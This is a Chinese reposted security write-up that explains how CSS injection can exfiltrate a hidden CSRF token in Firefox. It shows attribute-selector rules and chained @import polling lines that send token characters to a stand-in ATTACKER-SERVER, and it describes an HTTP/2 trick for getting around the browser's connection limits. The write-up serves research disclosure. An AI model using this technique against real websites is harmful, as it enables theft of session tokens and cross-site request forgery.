返回顶部
首页 > 资讯 > 精选 >在Firefox浏览器中如何利用CSS窃取数据
  • 779
分享到

在Firefox浏览器中如何利用CSS窃取数据

2023-06-08 04:06:58 779人浏览 独家记忆
摘要

这篇文章主要介绍了在Firefox浏览器中如何利用CSS窃取数据,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。0x00 前言几个月之前,我在Firefox中找到了一

这篇文章主要介绍了在Firefox浏览器中如何利用CSS窃取数据,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

0x00 前言

几个月之前,我在Firefox中找到了一个漏洞( CVE-2019-17016 )。在研究过程中,我发现了在Firefox浏览器中利用CSS的一种数据窃取技术,可以通过单个注入点窃取数据,这里我想与大家一起分享相关研究成果。

0x01 背景知识

为了演示方便,这里假设我们想窃取 <input> 元素中的CSRF令牌。

<input type="hidden" name="csrftoken" value="SOME_VALUE">

我们无法使用脚本(可能是因为CSP),因此想寻找基于样式的注入方法。传统方法是使用属性选择器,如下所示:

input[name='csrftoken'][value^='a'] {  background: url(//ATTACKER-SERVER/leak/a);}input[name='csrftoken'][value^='b'] {  background: url(//ATTACKER-SERVER/leak/b);}...input[name='csrftoken'][value^='z'] {  background: url(//ATTACKER-SERVER/leak/z);}

如果应用了CSS规则,那么攻击者就能收到Http请求,从而获取到令牌的第1个字符。随后,攻击者需要准备另一个样式表,其中包含已窃取的第1个字符,如下所示:

input[name='csrftoken'][value^='aa'] {  background: url(//ATTACKER-SERVER/leak/aa);}input[name='csrftoken'][value^='ab'] {  background: url(//ATTACKER-SERVER/leak/ab);}...input[name='csrftoken'][value^='az'] {  background: url(//ATTACKER-SERVER/leak/az);}

通常情况下,攻击者需要重新加载 <iframe> 中已加载的页面,以便提供后续样式表。

在2018年, Pepe Vila 提出了一个非常不错的想法,可以在Chrome浏览器中滥用 CSS递归import 方式,通过单个注入点完成相同任务。在2019年,Nathanial Lattimer( @d0nutptr )重新提出了相同 技巧 ,但稍微做了点改动。下面我稍微总结一下Lattimer的方法,这种方法与本文的思想比较接近(但我在此次研究过程中并不了解Lattimer之前的成果,因此可能有人会认为我在重复造轮子)。

简而言之,第一次注入用到了一堆 import

@import url(//ATTACKER-SERVER/polling?len=0);@import url(//ATTACKER-SERVER/polling?len=1);@import url(//ATTACKER-SERVER/polling?len=2);...

核心思想如下:

在一开始,只有第1个 @import 会返回样式表,其他语句处于连接阻塞状态。

第1个 @import 返回样式表,泄露令牌的第1个字符。

当泄露的第1个令牌到达 ATTACKER-SERVER ,第2个 import 停止阻塞,返回包含第1个字符的样式表,尝试泄露第2个字符。

当第2个泄露字符到达 ATTACKER-SERVER 时,第3个 import 停止阻塞&hellip;&hellip;以此类推。

这种技术之所以行之有效,是因为Chrome会采用异步方式处理 import ,因此当任何 import 停止阻塞时,Chrome会立即解析该语句并应用规则。

0x02 Firefox及样式表处理

前面提到的方法并不适用于Firefox,与Chrome浏览器相比,Firefox对样式表的处理方式大不相同。这里我以几个案例来说明其中差异。

首先,Firefox会采用同步方式处理样式表。因此,当样式表中有多个 import 时,只有当所有 import 都处理完毕时,Firefox才会应用CSS规则。考虑如下案例:

<style>@import '/polling/0';@import '/polling/1';@import '/polling/2';</style>

假设第1个 @import 返回CSS规则,将页面背景设置为蓝色,后续的 import 处于阻塞状态(比如永远不会返回任何内容,会挂起HTTP连接)。在Chrome浏览器中,页面会立即变为蓝色,而在Firefox中并不会有任何反应。

我们可以将所有 import 放在独立的 <style> 元素中,从而解决该问题:

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>

在上面代码中,Firefox会分别处理所有样式表,因此页面会立刻变蓝色,其他 import 会在后台处理。

但这里还有另一个问题,假设我们想窃取包含10个字符的令牌:

<style>@import '/polling/0';</style><style>@import '/polling/1';</style><style>@import '/polling/2';</style>...<style>@import '/polling/10';</style>

Firefox会立即将10个 import 加入队列。在处理完第1个 import 后,Firefox会将带有已知字符的另一个请求加入队列。这里的问题在于,该请求会被加到队列末尾。而在默认情况下,浏览器有个限制条件,到同一个服务器只能有6个并发连接。因此,带有已知字符的请求永远不会到达目标服务器,因为已经有到该服务器的6个阻塞连接,最终出现死现象。

0x03 HTTP/2

6个连接的限制条件由tcp层决定,因此到单个服务器只能有6个TCP连接同时存在。在这种情况下,我认为HTTP/2可能派上用场。HTTP/2有许多优点,比如我们可以通过单个连接发送多个HTTP请求(也就是所谓的多路传输( multiplexing )),从而大大提升性能。

Firefox对单个HTTP/2连接的并发请求数也有限制,但默认情况下限制数为 100 (具体设置参考 about:config 中的 network.http.spdy.default-concurrent )。如果我们需要更多并发数,可以使用不同的主机名,强制Firefox创建第2个TCP连接。比如,如果我们创建到 https://localhost:3000100 个请求,也创建到 https://127.0.0.1:300050 个请求,此时Firefox就会创建2个TCP连接。

0x04 利用方式

现在一切准备就绪,我们的主要利用场景如下:

利用代码基于HTTP/2。

通过 /polling/:session/:index 端点可以返回CSS,泄露第 :index 字符。该请求会处于阻塞状态,直到前一个请求成功泄露第 index-1 个字符。 :session 路径参数用来区分多次攻击行为。

通过 /leak/:session/:value 端点来泄露整个令牌。这里 :value 为获取到的完整值,而不单单是最后一个字符。

为了强制Firefox向同一个服务器发起2个TCP连接,这里用到了两个端点,分别为 https://localhost:3000https://127.0.0.1:3000

端点 /generate 用来生成示例代码。

我创建了一个 测试平台 ,目标是通过这种方式窃取 csrftoken ,大家可通过 此处 直接访问该平台。

在Firefox浏览器中如何利用CSS窃取数据

此外,我还在GitHub上托管了 PoC代码 ,攻击过程可参考 此处视频 。

有趣的是,由于我们使用的是HTTP/2,因此攻击过程非常快速,不到3秒就能获取到整个令牌。

0x05 总结

在本文中,我演示了如何利用1个注入点,在不想重载页面的情况下,通过CSS窃取数据。这里主要涉及2个要点:

@import 规则拆分成多个样式表,后续 import 不会阻塞浏览器对整个样式表的处理。

为了绕过TCP并发连接数限制,我们需要通过HTTP/2发起攻击。

感谢你能够认真阅读完这篇文章,希望小编分享的“在Firefox浏览器中如何利用CSS窃取数据”这篇文章对大家有帮助,同时也希望大家多多支持编程网,关注编程网精选频道,更多相关知识等着你来学习!

--结束END--

本文标题: 在Firefox浏览器中如何利用CSS窃取数据

本文链接: https://lsjlt.com/news/251836.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • 在Firefox浏览器中如何利用CSS窃取数据
    这篇文章主要介绍了在Firefox浏览器中如何利用CSS窃取数据,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。0x00 前言几个月之前,我在Firefox中找到了一...
    99+
    2023-06-08
  • Ubuntu中如何使用Firefox浏览器
    本文小编为大家详细介绍“Ubuntu中如何使用Firefox浏览器”,内容详细,步骤清晰,细节处理妥当,希望这篇“Ubuntu中如何使用Firefox浏览器”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。点击启动F...
    99+
    2023-07-04
  • CSS如何区分IE6、IE7和Firefox浏览器
    今天小编给大家分享一下CSS如何区分IE6、IE7和Firefox浏览器的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。CSS...
    99+
    2023-07-04
  • Firefox浏览器怎么在Ubuntu系统中使用
    今天就跟大家聊聊有关Firefox浏览器怎么在Ubuntu系统中使用,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。点击启动 Firefox,访问电视直播网站。直播地址可以通过百度搜索...
    99+
    2023-06-07
  • 在Fedora中如何利用ffsend使用Firefox Send
    这篇文章将为大家详细讲解有关在Fedora中如何利用ffsend使用Firefox Send,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。什么是 Firefox Send 和 ffsend?Firefox...
    99+
    2023-06-16
  • python中如何利用selenium进行浏览器爬虫
    这篇文章给大家介绍python中如何利用selenium进行浏览器爬虫,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。相信大家刚开始在做爬虫的时候,是不是requests和sound这两个库来使用,这样确实有助于我们学习...
    99+
    2023-06-02
  • 如何利用QT实现图片浏览器
    这篇文章主要介绍了如何利用QT实现图片浏览器的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇如何利用QT实现图片浏览器文章都会有所收获,下面我们一起来看看吧。1、概述案例:制作一个小的图片浏览器,要求可以显示jp...
    99+
    2023-07-05
  • 如何解决ubuntu系统使用firefox浏览器上网很慢的问题
    这篇文章主要介绍如何解决ubuntu系统使用firefox浏览器上网很慢的问题,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!在ubuntu下用firefox等浏览器上网,往往比在windows下上网要慢好多,但细心的...
    99+
    2023-06-13
  • 如何解决Ajax请求过程中下载文件在FireFox浏览器下的兼容问题
    本篇文章为大家展示了如何解决Ajax请求过程中下载文件在FireFox浏览器下的兼容问题,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。需求很简单,点击一个文件链接下...
    99+
    2024-04-02
  • 如何用CSS Grid布局使浏览器开启CSS Grid Layout
    这篇文章主要介绍“如何用CSS Grid布局使浏览器开启CSS Grid Layout”,在日常操作中,相信很多人在如何用CSS Grid布局使浏览器开启CSS Grid Layout问题上存在疑惑,小编查...
    99+
    2024-04-02
  • css中如何能清除浏览器默认样式
    小编给大家分享一下css中如何能清除浏览器默认样式,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!   css清除浏览器默认样式...
    99+
    2024-04-02
  • 如何在Kotlin中利用SharedPreferences对数据进行存取
    这篇文章将为大家详细讲解有关如何在Kotlin中利用SharedPreferences对数据进行存取,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。具体方法如下class Preference...
    99+
    2023-05-31
    kotlin sharedpreferences
  • 如何在Linux中安装Microsoft Edge浏览器
    本篇文章给大家分享的是有关如何在Linux中安装Microsoft Edge浏览器,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。相比大家对Microsoft Edge浏览器都很...
    99+
    2023-06-28
  • 如何在Dreamweaver中添加调试浏览器
    如何在Dreamweaver中添加调试浏览器?很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。点击菜单栏的编辑--首选参数在打开的窗口左侧选择”在浏览器中浏览“,在...
    99+
    2023-06-08
  • 如何在浏览器中正确设置Cookie?
    在现代Web应用程序的开发中,Cookie是最重要的概念之一。Cookie是由服务器发送到客户端浏览器的一段文本,该文本包含了一些关于用户和应用程序的信息。此信息可保存在用户的计算机上,并与将来的请求一道发送。本文将介绍如何在浏...
    99+
    2024-01-19
    浏览器 编程 设置Cookie
  • css如何实现元素在当前浏览器中垂直水平居中
    这篇文章给大家分享的是有关css如何实现元素在当前浏览器中垂直水平居中的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。元素在当前浏览器中垂直水平居中  body{   backgr...
    99+
    2024-04-02
  • 浏览器客户端如何做数据加密
    在浏览器客户端中使用RSA进行数据加密的方法具体方法如下:rsa.htmlbody {margin: 20% 30%;font-size: 24px;font-weight: bold;}.encrypted-msg {word-break...
    99+
    2024-04-02
  • css如何设置兼容浏览器的中文字体
    这篇文章主要介绍了css如何设置兼容浏览器的中文字体,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。 高版本IE涉猎器(譬喻IE9)和有的行...
    99+
    2024-04-02
  • VBScript如何通过剪贴板抓取URL并在浏览器中打开
    这篇文章主要介绍了VBScript如何通过剪贴板抓取URL并在浏览器中打开,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。这是很有趣的问题,或者我们应当说,这是两个很有趣的问题...
    99+
    2023-06-08
  • 如何在Kali Linux中安装谷歌浏览器
    如何在Kali Linux中安装谷歌浏览器,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Kali Linux安装谷歌浏览器Kali Linux默认安装的是火...
    99+
    2023-06-05
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作